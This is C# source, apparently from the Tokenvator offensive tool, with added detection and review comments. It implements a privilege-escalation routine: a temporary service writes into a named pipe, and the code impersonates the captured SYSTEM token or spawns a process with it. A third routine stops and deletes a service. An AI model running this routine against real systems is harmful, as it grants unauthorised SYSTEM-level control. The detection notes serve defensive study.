////////////////////////////////////////////////////////////////////////////////
// Runs _GetPipeToken against \\.\pipe\Tokenvator on a worker thread, drives a
// PSExec object named "Tokenvator" whose command line echoes into that pipe,
// and, if the shared hToken field ends up non-zero, impersonates that token
// on the calling thread before closing and clearing the handle.
//
// Detection notes: the name "Tokenvator", the pipe path and the
// "%COMSPEC% /c echo ... > \\.\pipe\..." command line are fixed strings.
// PSExec presumably wraps the Service Control Manager (not shown here -
// confirm); if so, service-install events (7045 in the System log, 4697 in
// the Security log) and named-pipe creation telemetry (Sysmon event ID 17)
// would carry these values.
//
// NOTE(review): the result of ImpersonateLoggedOnUser is not inspected; the
// identity printed afterwards is whatever WindowsIdentity.GetCurrent() reports.
////////////////////////////////////////////////////////////////////////////////
internal static void GetSystem()
{
    const string pipePath = @"\\.\pipe\Tokenvator";
    Thread pipeWorker = new Thread(() => _GetPipeToken(pipePath));

    using (PSExec service = new PSExec("Tokenvator"))
    {
        service.Connect(".");
        service.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
        service.Open();

        // Order matters: the worker is started and waitHandle is signalled
        // before the PSExec object is started.
        pipeWorker.Start();
        waitHandle.WaitOne();

        service.Start();
        service.Stop();
    }

    pipeWorker.Join();

    // Nothing to impersonate when the worker left no token behind.
    if (IntPtr.Zero == hToken)
    {
        return;
    }

    advapi32.ImpersonateLoggedOnUser(hToken);
    kernel32.CloseHandle(hToken);

    string identity = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
    Console.WriteLine("[+] Operating as {0}", identity);

    // Clear the shared field so the closed handle is not reused.
    hToken = IntPtr.Zero;
}
////////////////////////////////////////////////////////////////////////////////
// Same pipe/PSExec sequence as the parameterless overload, but instead of
// impersonating on the current thread it passes the shared hToken, together
// with command and arguments, to a process-creation delegate:
// CreateProcess.CreateProcessWithLogonW when the current process is in
// session 0, CreateProcess.CreateProcessWithTokenW otherwise.
//
// Detection notes: besides the fixed "Tokenvator" name, pipe path and
// "%COMSPEC% /c echo ..." command line, a child process started under a
// different token than its parent is the observable outcome of this path.
//
// NOTE(review): unlike the parameterless overload, hToken is neither compared
// against IntPtr.Zero before use nor closed or cleared afterwards.
////////////////////////////////////////////////////////////////////////////////
internal static void GetSystem(String command, String arguments)
{
    const string pipePath = @"\\.\pipe\Tokenvator";
    Thread pipeWorker = new Thread(() => _GetPipeToken(pipePath));

    using (PSExec service = new PSExec("Tokenvator"))
    {
        service.Connect(".");
        service.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
        service.Open();

        // Order matters: the worker is started and waitHandle is signalled
        // before the PSExec object is started.
        pipeWorker.Start();
        waitHandle.WaitOne();

        service.Start();
        service.Stop();
    }

    pipeWorker.Join();

    // Default to the token-based call; session 0 switches to the logon-based one.
    int sessionId = System.Diagnostics.Process.GetCurrentProcess().SessionId;
    Create launcher = CreateProcess.CreateProcessWithTokenW;
    if (0 == sessionId)
    {
        launcher = CreateProcess.CreateProcessWithLogonW;
    }

    launcher(hToken, command, arguments);
}
////////////////////////////////////////////////////////////////////////////////
// Reads the "servicename" value from the parsed command line and, on a PSExec
// object for that name, runs Connect("."), Open(), Stop() and Delete() in that
// order, stopping at the first step that returns false.
// Prints an error when no service name was supplied.
//
// NOTE(review): the lookup key is "servicename" while the message refers to
// "/Service" - confirm which spelling the command line actually accepts.
////////////////////////////////////////////////////////////////////////////////
private static void _UnInstallDriver(CommandLineParsing cLP)
{
    string service;
    if (!cLP.GetData("servicename", out service))
    {
        Console.WriteLine("[-] Unable to identify /Service");
        return;
    }

    using (PSExec controller = new PSExec(service))
    {
        // Short-circuit evaluation keeps the original behaviour: each step
        // runs only if every earlier step succeeded.
        if (controller.Connect(".") && controller.Open() && controller.Stop())
        {
            controller.Delete();
        }
    }
}